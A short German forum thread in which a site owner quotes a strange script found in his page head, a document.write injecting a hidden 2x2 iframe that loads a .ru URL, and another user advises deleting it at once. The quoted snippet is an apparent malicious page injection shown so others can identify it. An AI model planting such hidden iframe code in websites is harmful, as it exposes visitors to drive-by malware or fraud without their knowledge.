Seite 1 von 1

Plugin, Virus oder was

Verfasst: 09.07.2012, 19:37
von wolle01
Ich habe seit ein paar Tagen im Head-Bereich ein ungewöhnliches Script.

<script type="text/javascript">
document.write('<iframe src="https://flipsphere.ru/in.cgi?16" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');
</script>

Ich bin mir nicht sicher was dieses Script macht. Ist das ein Virus. Wird dieses Script durch ein Plugin installiert? Höhe und Breite 2 finde ich verdächtig. Welches Plugin ist das womöglich?

Danke für entsprechende Antworten.

Grüße aus Hamburg

Verfasst:
von

Verfasst: 09.07.2012, 19:53
von MonikaTS
https://www.abakus-internet-marketing.d ... ht=gehackt


und vorallem sofort das rauslöschen

niemals ein fremdes Script wo drin lassen, wenn man es nicht identifizieren kann